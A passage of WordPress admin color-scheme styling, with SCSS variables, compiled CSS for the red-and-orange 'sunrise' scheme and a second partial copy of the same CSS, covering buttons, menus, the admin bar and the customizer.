hsl(color.channel($base-color, "hue", $space: hsl), 7%, 95%) !default; $highlight-color: #0073aa !default; $notification-color: #d54e21 !default; // global $body-background: $gray-100 !default; $link: #0073aa !default; $link-focus: color.adjust($link, $lightness: 10%) !default; $button-color: $highlight-color !default; $button-text-color: $text-color !default; $form-checked: #7e8993 !default; // admin menu & admin-bar $menu-text: $text-color !default; $menu-icon: $icon-color !default; $menu-background: $base-color !default; $menu-highlight-text: $text-color !default; $menu-highlight-icon: $text-color !default; $menu-highlight-background: $highlight-color !default; $menu-current-text: $menu-highlight-text !default; $menu-current-icon: $menu-highlight-icon !default; $menu-current-background: $menu-highlight-background !default; $menu-submenu-text: color.mix( $base-color, $text-color, 30% ) !default; $menu-submenu-background: color.adjust($base-color, $lightness: -7%) !default; $menu-submenu-background-alt: color.adjust(color.adjust($menu-background, $lightness: 7%), $saturation: -7%) !default; $menu-submenu-focus-text: $highlight-color !default; $menu-submenu-current-text: $text-color !default; $menu-bubble-text: $text-color !default; $menu-bubble-background: $notification-color !default; $menu-bubble-current-text: $text-color !default; $menu-bubble-current-background: $menu-submenu-background !default; $menu-collapse-text: $menu-icon !default; $menu-collapse-icon: $menu-icon !default; $menu-collapse-focus-text: $text-color !default; $menu-collapse-focus-icon: $menu-highlight-icon !default; $adminbar-avatar-frame: color.adjust($menu-background, $lightness: 7%) !default; $adminbar-input-background: color.adjust($menu-background, $lightness: 7%) !default; $adminbar-recovery-exit-text: $menu-bubble-text !default; $adminbar-recovery-exit-background: $menu-bubble-background !default; $adminbar-recovery-exit-background-alt: color.mix(black, $adminbar-recovery-exit-background, 10%) !default; $menu-customizer-text: color.mix( $base-color, $text-color, 40% ) !default; // Dashboard Colors $custom-welcome-panel: "true" !default; $dashboard-accent-1: $menu-submenu-background !default; $dashboard-accent-2: $menu-background !default; $dashboard-icon-background: $dashboard-accent-2 !default; $low-contrast-theme: "false" !default; /*! This file is auto-generated */ /* * Button mixin - creates a primary button effect. * Uses CSS custom properties for theme color support across color schemes. */ /* * Secondary button mixin - outlined style with theme color. * Matches Gutenberg's .is-secondary button variant. */ /* * Tertiary button mixin - transparent background, gray text. */ /** * This function name uses British English to maintain backward compatibility, as developers * may use the function in their own admin CSS files. See #56811. */ body { background: #f0f0f0; } /* Links */ a { color: #0073aa; } a:hover, a:active, a:focus { color: rgb(0, 149.5, 221); } #post-body .misc-pub-post-status:before, #post-body #visibility:before, .curtime #timestamp:before, #post-body .misc-pub-revisions:before, span.wp-media-buttons-icon:before { color: currentColor; } /* Link button - appears as text link, no border or background */ /* Matches Gutenberg's .is-link button variant */ .wp-core-ui .button-link, .wp-core-ui .button.button-link { color: var(--wp-admin-theme-color); } .wp-core-ui .button-link:hover, .wp-core-ui .button-link:active, .wp-core-ui .button.button-link:hover, .wp-core-ui .button.button-link:active { color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-link:focus, .wp-core-ui .button.button-link:focus { color: var(--wp-admin-theme-color); border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-link:disabled, .wp-core-ui .button-link[aria-disabled=true], .wp-core-ui .button.button-link:disabled, .wp-core-ui .button.button-link[aria-disabled=true] { color: #949494; } .media-modal .delete-attachment, .media-modal .trash-attachment, .media-modal .untrash-attachment, .wp-core-ui .button-link-delete { color: #cc1818; } .media-modal .delete-attachment:hover, .media-modal .trash-attachment:hover, .media-modal .untrash-attachment:hover, .media-modal .delete-attachment:focus, .media-modal .trash-attachment:focus, .media-modal .untrash-attachment:focus, .wp-core-ui .button-link-delete:hover, .wp-core-ui .button-link-delete:focus { color: rgb(230.6842105263, 48.3157894737, 48.3157894737); } /* Forms */ input[type=checkbox]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } input[type=radio]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } .wp-core-ui input[type=reset]:hover, .wp-core-ui input[type=reset]:active { color: rgb(0, 149.5, 221); } input[type=text]:focus, input[type=password]:focus, input[type=color]:focus, input[type=date]:focus, input[type=datetime]:focus, input[type=datetime-local]:focus, input[type=email]:focus, input[type=month]:focus, input[type=number]:focus, input[type=search]:focus, input[type=tel]:focus, input[type=time]:focus, input[type=url]:focus, input[type=week]:focus, select:focus, textarea:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } input[type=checkbox]:focus, input[type=radio]:focus { border-color: #1e1e1e; box-shadow: 0 0 0 2px #ffffff, 0 0 0 4px var(--wp-admin-theme-color); outline: 2px solid transparent; } .wp-core-ui select:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .wp-tags-autocomplete .ui-state-focus, .wp-tags-autocomplete [aria-selected=true] { background-color: var(--wp-admin-theme-color); } #pass1:focus, #pass1-text:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .mailserver-pass-wrap .button.wp-hide-pw:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } /* Core UI */ .wp-core-ui { /* Default button - theme color border and text (matches secondary) */ } .wp-core-ui .button { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button:disabled, .wp-core-ui .button.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Secondary button - same as default */ } .wp-core-ui .button-secondary { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button-secondary:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-secondary:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-secondary:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button-secondary:disabled, .wp-core-ui .button-secondary.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Primary button - theme color background */ } .wp-core-ui .button-primary { background: var(--wp-admin-theme-color); border-color: transparent; border-radius: 2px; color: #fff; } .wp-core-ui .button-primary:hover { background: var(--wp-admin-theme-color-darker-10); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:focus { background: var(--wp-admin-theme-color); border-color: transparent; color: #fff; /* Gutenberg-style focus ring: outer theme color + inset white for contrast */ box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color), inset 0 0 0 1px #ffffff; /* Visible in Windows High Contrast mode */ outline: 1px solid transparent; } .wp-core-ui .button-primary:active { background: var(--wp-admin-theme-color-darker-20); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:disabled, .wp-core-ui .button-primary.disabled { background: #f0f0f0; border-color: transparent; color: #949494; cursor: not-allowed; } .wp-core-ui .button-primary.active, .wp-core-ui .button-primary.active:focus, .wp-core-ui .button-primary.active:hover { background: var(--wp-admin-theme-color-darker-10); color: #fff; border-color: transparent; box-shadow: none; } .wp-core-ui .button-group > .button.active { border-color: var(--wp-admin-theme-color); background: rgba(var(--wp-admin-theme-color--rgb), 0.08); } .wp-core-ui .wp-ui-primary { color: #fff; background-color: #cf4944; } .wp-core-ui .wp-ui-text-primary { color: #cf4944; } .wp-core-ui .wp-ui-highlight { color: #fff; background-color: #dd823b; } .wp-core-ui .wp-ui-text-highlight { color: #dd823b; } .wp-core-ui .wp-ui-notification { color: #fff; background-color: #ccaf0b; } .wp-core-ui .wp-ui-text-notification { color: #ccaf0b; } .wp-core-ui .wp-ui-text-icon { color: hsl(2.1582733813, 7%, 95%); } /* List tables */ .wrap .page-title-action { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wrap .page-title-action:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wrap .page-title-action:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wrap .page-title-action:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .view-switch a.current:before { color: #cf4944; } .view-switch a:hover:before { color: #ccaf0b; } /* Admin Menu */ #adminmenuback, #adminmenuwrap, #adminmenu { background: #cf4944; } #adminmenu a { color: #fff; } #adminmenu div.wp-menu-image:before { color: hsl(2.1582733813, 7%, 95%); } #adminmenu a:hover, #adminmenu li.menu-top:hover, #adminmenu li.opensub > a.menu-top, #adminmenu li > a.menu-top:focus { color: #fff; background-color: #dd823b; } #adminmenu li.menu-top:hover div.wp-menu-image:before, #adminmenu li.opensub > a.menu-top div.wp-menu-image:before { color: #fff; } /* Active tabs use a bottom border color that matches the page background color. */ .about-wrap .nav-tab-active, .nav-tab-active, .nav-tab-active:hover { background-color: #f0f0f0; border-bottom-color: #f0f0f0; } /* Admin Menu: submenu */ #adminmenu .wp-submenu, #adminmenu .wp-has-current-submenu .wp-submenu, #adminmenu .wp-has-current-submenu.opensub .wp-submenu, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu { background: rgb(190.4217021277, 53.969787234, 48.8782978723); } #adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-left-color: rgb(190.4217021277, 53.969787234, 48.8782978723); } #adminmenu .wp-submenu .wp-submenu-head { color: rgb(240.6, 200.4, 198.9); } #adminmenu .wp-submenu a, #adminmenu .wp-has-current-submenu .wp-submenu a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a { color: rgb(240.6, 200.4, 198.9); } #adminmenu .wp-submenu a:focus, #adminmenu .wp-submenu a:hover, #adminmenu .wp-has-current-submenu .wp-submenu a:focus, #adminmenu .wp-has-current-submenu .wp-submenu a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } /* Admin Menu: current */ #adminmenu .wp-submenu li.current a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a { color: #fff; } #adminmenu .wp-submenu li.current a:hover, #adminmenu .wp-submenu li.current a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } ul#adminmenu a.wp-has-current-submenu:after, ul#adminmenu > li.current > a.current:after { border-left-color: #f0f0f0; } #adminmenu li.current a.menu-top, #adminmenu li.wp-has-current-submenu a.wp-has-current-submenu, #adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head, .folded #adminmenu li.current.menu-top { color: #fff; background: #dd823b; } #adminmenu li.wp-has-current-submenu div.wp-menu-image:before, #adminmenu a.current:hover div.wp-menu-image:before, #adminmenu li.current div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before, #adminmenu li:hover div.wp-menu-image:before, #adminmenu li a:focus div.wp-menu-image:before, #adminmenu li.opensub div.wp-menu-image:before { color: #fff; } /* Admin Menu: bubble */ #adminmenu .menu-counter, #adminmenu .awaiting-mod, #adminmenu .update-plugins { color: #fff; background: #ccaf0b; } #adminmenu li.current a .awaiting-mod, #adminmenu li a.wp-has-current-submenu .update-plugins, #adminmenu li:hover a .awaiting-mod, #adminmenu li.menu-top:hover > a .update-plugins { color: #fff; background: rgb(190.4217021277, 53.969787234, 48.8782978723); } /* Admin Menu: collapse button */ #collapse-button { color: hsl(2.1582733813, 7%, 95%); } #collapse-button:hover, #collapse-button:focus { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } /* Admin Bar */ #wpadminbar { color: #fff; background: #cf4944; } #wpadminbar .ab-item, #wpadminbar a.ab-item, #wpadminbar > #wp-toolbar span.ab-label, #wpadminbar > #wp-toolbar span.noticon { color: #fff; } #wpadminbar .ab-icon, #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar .ab-item:after { color: hsl(2.1582733813, 7%, 95%); } #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojq .quicklinks .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojs .ab-top-menu > li.menupop:hover > .ab-item, #wpadminbar .ab-top-menu > li.menupop.hover > .ab-item { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); background: rgb(190.4217021277, 53.969787234, 48.8782978723); } #wpadminbar:not(.mobile) > #wp-toolbar li:hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar li.hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar a:focus span.ab-label { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } #wpadminbar:not(.mobile) li:hover .ab-icon:before, #wpadminbar:not(.mobile) li:hover .ab-item:before, #wpadminbar:not(.mobile) li:hover .ab-item:after, #wpadminbar:not(.mobile) li:hover #adminbarsearch:before { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } /* Admin Bar: submenu */ #wpadminbar .menupop .ab-sub-wrapper { background: rgb(190.4217021277, 53.969787234, 48.8782978723); } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary, #wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu { background: rgb(207.3164148936, 107.1221761059, 103.3835851064); } #wpadminbar .ab-submenu .ab-item, #wpadminbar .quicklinks .menupop ul li a, #wpadminbar .quicklinks .menupop.hover ul li a, #wpadminbar.nojs .quicklinks .menupop:hover ul li a { color: rgb(240.6, 200.4, 198.9); } #wpadminbar .quicklinks li .blavatar, #wpadminbar .menupop .menupop > .ab-item:before { color: hsl(2.1582733813, 7%, 95%); } #wpadminbar .quicklinks .menupop ul li a:hover, #wpadminbar .quicklinks .menupop ul li a:focus, #wpadminbar .quicklinks .menupop ul li a:hover strong, #wpadminbar .quicklinks .menupop ul li a:focus strong, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a, #wpadminbar .quicklinks .menupop.hover ul li a:hover, #wpadminbar .quicklinks .menupop.hover ul li a:focus, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus, #wpadminbar li:hover .ab-icon:before, #wpadminbar li:hover .ab-item:before, #wpadminbar li a:focus .ab-icon:before, #wpadminbar li .ab-item:focus:before, #wpadminbar li .ab-item:focus .ab-icon:before, #wpadminbar li.hover .ab-icon:before, #wpadminbar li.hover .ab-item:before, #wpadminbar li:hover #adminbarsearch:before, #wpadminbar li #adminbarsearch.adminbar-focused:before { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } #wpadminbar .quicklinks li a:hover .blavatar, #wpadminbar .quicklinks li a:focus .blavatar, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a .blavatar, #wpadminbar .menupop .menupop > .ab-item:hover:before, #wpadminbar.mobile .quicklinks .hover .ab-icon:before, #wpadminbar.mobile .quicklinks .hover .ab-item:before { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } #wpadminbar.mobile .quicklinks .ab-icon:before, #wpadminbar.mobile .quicklinks .ab-item:before { color: hsl(2.1582733813, 7%, 95%); } /* Admin Bar: search */ #wpadminbar #adminbarsearch:before { color: hsl(2.1582733813, 7%, 95%); } #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus { color: #fff; background: rgb(214.2919148936, 100.6485106383, 96.4080851064); } /* Admin Bar: recovery mode */ #wpadminbar #wp-admin-bar-recovery-mode { color: #fff; background-color: #ccaf0b; } #wpadminbar #wp-admin-bar-recovery-mode .ab-item, #wpadminbar #wp-admin-bar-recovery-mode a.ab-item { color: #fff; } #wpadminbar .ab-top-menu > #wp-admin-bar-recovery-mode.hover > .ab-item, #wpadminbar.nojq .quicklinks .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus { color: #fff; background-color: rgb(183.6, 157.5, 9.9); } /* Admin Bar: my account */ #wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img { border-color: rgb(214.2919148936, 100.6485106383, 96.4080851064); background-color: rgb(214.2919148936, 100.6485106383, 96.4080851064); } #wpadminbar #wp-admin-bar-user-info .display-name { color: #fff; } #wpadminbar #wp-admin-bar-user-info a:hover .display-name { color: rgb(247.3869565217, 227.0108695652, 211.1130434783); } #wpadminbar #wp-admin-bar-user-info .username { color: rgb(240.6, 200.4, 198.9); } /* Pointers */ .wp-pointer .wp-pointer-content h3 { background-color: #dd823b; border-color: rgb(216.8782608696, 116.1847826087, 37.6217391304); } .wp-pointer .wp-pointer-content h3:before { color: #dd823b; } .wp-pointer.wp-pointer-top .wp-pointer-arrow, .wp-pointer.wp-pointer-top .wp-pointer-arrow-inner, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner { border-bottom-color: #dd823b; } /* Media */ .media-item .bar, .media-progress-bar div { background-color: #dd823b; } .details.attachment { box-shadow: inset 0 0 0 3px #fff, inset 0 0 0 7px #dd823b; } .attachment.details .check { background-color: #dd823b; box-shadow: 0 0 0 1px #fff, 0 0 0 2px #dd823b; } .media-selection .attachment.selection.details .thumbnail { box-shadow: 0 0 0 1px #fff, 0 0 0 3px #dd823b; } /* Themes */ .theme-browser .theme.active .theme-name, .theme-browser .theme.add-new-theme a:hover:after, .theme-browser .theme.add-new-theme a:focus:after { background: #dd823b; } .theme-browser .theme.add-new-theme a:hover span:after, .theme-browser .theme.add-new-theme a:focus span:after { color: #dd823b; } .theme-section.current, .theme-filter.current { border-bottom-color: #cf4944; } body.more-filters-opened .more-filters { color: #fff; background-color: #cf4944; } body.more-filters-opened .more-filters:before { color: #fff; } body.more-filters-opened .more-filters:hover, body.more-filters-opened .more-filters:focus { background-color: #dd823b; color: #fff; } body.more-filters-opened .more-filters:hover:before, body.more-filters-opened .more-filters:focus:before { color: #fff; } /* Widgets */ .widgets-chooser li.widgets-chooser-selected { background-color: #dd823b; color: #fff; } .widgets-chooser li.widgets-chooser-selected:before, .widgets-chooser li.widgets-chooser-selected:focus:before { color: #fff; } /* Nav Menus */ .nav-menus-php .item-edit:focus:before { box-shadow: 0 0 0 1px rgb(228.5391304348, 157.7173913043, 102.4608695652), 0 0 2px 1px #dd823b; } /* Responsive Component */ div#wp-responsive-toggle a:before { color: hsl(2.1582733813, 7%, 95%); } .wp-responsive-open div#wp-responsive-toggle a { border-color: transparent; background: #dd823b; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a { background: rgb(190.4217021277, 53.969787234, 48.8782978723); } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { color: hsl(2.1582733813, 7%, 95%); } /* TinyMCE */ .mce-container.mce-menu .mce-menu-item:hover, .mce-container.mce-menu .mce-menu-item.mce-selected, .mce-container.mce-menu .mce-menu-item:focus, .mce-container.mce-menu .mce-menu-item-normal.mce-active, .mce-container.mce-menu .mce-menu-item-preview.mce-active { background: #dd823b; } /* Customizer */ .wp-core-ui #customize-controls .control-section:hover > .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:hover, .wp-core-ui #customize-controls .control-section.open .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:focus { color: #0073aa; border-right-color: #dd823b; } .wp-core-ui .customize-controls-close:focus, .wp-core-ui .customize-controls-close:hover, .wp-core-ui .customize-controls-preview-toggle:focus, .wp-core-ui .customize-controls-preview-toggle:hover { color: #0073aa; border-top-color: #dd823b; } .wp-core-ui .customize-panel-back:hover, .wp-core-ui .customize-panel-back:focus, .wp-core-ui .customize-section-back:hover, .wp-core-ui .customize-section-back:focus { color: #0073aa; border-right-color: #dd823b; } .wp-core-ui .customize-screen-options-toggle:hover, .wp-core-ui .customize-screen-options-toggle:active, .wp-core-ui .customize-screen-options-toggle:focus, .wp-core-ui .active-menu-screen-options .customize-screen-options-toggle, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus { color: #0073aa; } .wp-core-ui .customize-screen-options-toggle:focus:before, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before, .wp-core-ui.wp-customizer button:focus .toggle-indicator:before, .wp-core-ui .menu-item-bar .item-delete:focus:before, .wp-core-ui #available-menu-items .item-add:focus:before, .wp-core-ui #customize-save-button-wrapper .save:focus, .wp-core-ui #publish-settings:focus { box-shadow: 0 0 0 1px rgb(228.5391304348, 157.7173913043, 102.4608695652), 0 0 2px 1px #dd823b; } .wp-core-ui #customize-controls .customize-info.open .customize-help-toggle, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover { color: #0073aa; } .wp-core-ui .control-panel-themes .customize-themes-section-title:focus, .wp-core-ui .control-panel-themes .customize-themes-section-title:hover { border-right-color: #dd823b; color: #0073aa; } .wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after { background: #dd823b; } .wp-core-ui .control-panel-themes .customize-themes-section-title.selected { color: #0073aa; } .wp-core-ui #customize-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after, .wp-core-ui #customize-outer-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after { color: #0073aa; } .wp-core-ui .customize-control .attachment-media-view .button-add-media:focus { background-color: #fbfbfc; border-color: #dd823b; border-style: solid; box-shadow: 0 0 0 1px #dd823b; outline: 2px solid transparent; } .wp-core-ui .wp-full-overlay-footer .devices button:focus, .wp-core-ui .wp-full-overlay-footer .devices button.active:hover { border-bottom-color: #dd823b; } .wp-core-ui .wp-full-overlay-footer .devices button:hover:before, .wp-core-ui .wp-full-overlay-footer .devices button:focus:before { color: #dd823b; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus { color: #dd823b; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow { box-shadow: 0 0 0 1px rgb(228.5391304348, 157.7173913043, 102.4608695652), 0 0 2px 1px #dd823b; } .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover { border-bottom-color: #dd823b; color: #0073aa; }@use "sass:color"; $highlight-color: #dd823b; @use "../_admin.scss" with ( $scheme-name: "sunrise", $base-color: #cf4944, $highlight-color: $highlight-color, $notification-color: #ccaf0b, $menu-submenu-focus-text: color.adjust($highlight-color, $lightness: 35%) ); /*! This file is auto-generated */ /* * Button mixin - creates a primary button effect. * Uses CSS custom properties for theme color support across color schemes. */ /* * Secondary button mixin - outlined style with theme color. * Matches Gutenberg's .is-secondary button variant. */ /* * Tertiary button mixin - transparent background, gray text. */ /** * This function name uses British English to maintain backward compatibility, as developers * may use the function in their own admin CSS files. See #56811. */ body { background: #f0f0f0; } /* Links */ a { color: #0073aa; } a:hover, a:active, a:focus { color: rgb(0, 149.5, 221); } #post-body .misc-pub-post-status:before, #post-body #visibility:before, .curtime #timestamp:before, #post-body .misc-pub-revisions:before, span.wp-media-buttons-icon:before { color: currentColor; } /* Link button - appears as text link, no border or background */ /* Matches Gutenberg's .is-link button variant */ .wp-core-ui .button-link, .wp-core-ui .button.button-link { color: var(--wp-admin-theme-color); } .wp-core-ui .button-link:hover, .wp-core-ui .button-link:active, .wp-core-ui .button.button-link:hover, .wp-core-ui .button.button-link:active { color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-link:focus, .wp-core-ui .button.button-link:focus { color: var(--wp-admin-theme-color); border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-link:disabled, .wp-core-ui .button-link[aria-disabled=true], .wp-core-ui .button.button-link:disabled, .wp-core-ui .button.button-link[aria-disabled=true] { color: #949494; } .media-modal .delete-attachment, .media-modal .trash-attachment, .media-modal .untrash-attachment, .wp-core-ui .button-link-delete { color: #cc1818; } .media-modal .delete-attachment:hover, .media-modal .trash-attachment:hover, .media-modal .untrash-attachment:hover, .media-modal .delete-attachment:focus, .media-modal .trash-attachment:focus, .media-modal .untrash-attachment:focus, .wp-core-ui .button-link-delete:hover, .wp-core-ui .button-link-delete:focus { color: rgb(230.6842105263, 48.3157894737, 48.3157894737); } /* Forms */ input[type=checkbox]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } input[type=radio]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } .wp-core-ui input[type=reset]:hover, .wp-core-ui input[type=reset]:active { color: rgb(0, 149.5, 221); } input[type=text]:focus, input[type=password]:focus, input[type=color]:focus, input[type=date]:focus, input[type=datetime]:focus, input[type=datetime-local]:focus, input[type=email]:focus, input[type=month]:focus, input[type=number]:focus, input[type=search]:focus, input[type=tel]:focus, input[type=time]:focus, input[type=url]:focus, input[type=week]:focus, select:focus, textarea:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } input[type=checkbox]:focus, input[type=radio]:focus { border-color: #1e1e1e; box-shadow: 0 0 0 2px #ffffff, 0 0 0 4px var(--wp-admin-theme-color); outline: 2px solid transparent; } .wp-core-ui select:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .wp-tags-autocomplete .ui-state-focus, .wp-tags-autocomplete [aria-selected=true] { background-color: var(--wp-admin-theme-color); } #pass1:focus, #pass1-text:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .mailserver-pass-wrap .button.wp-hide-pw:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } /* Core UI */ .wp-core-ui { /* Default button - theme color border and text (matches secondary) */ } .wp-core-ui .button { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); 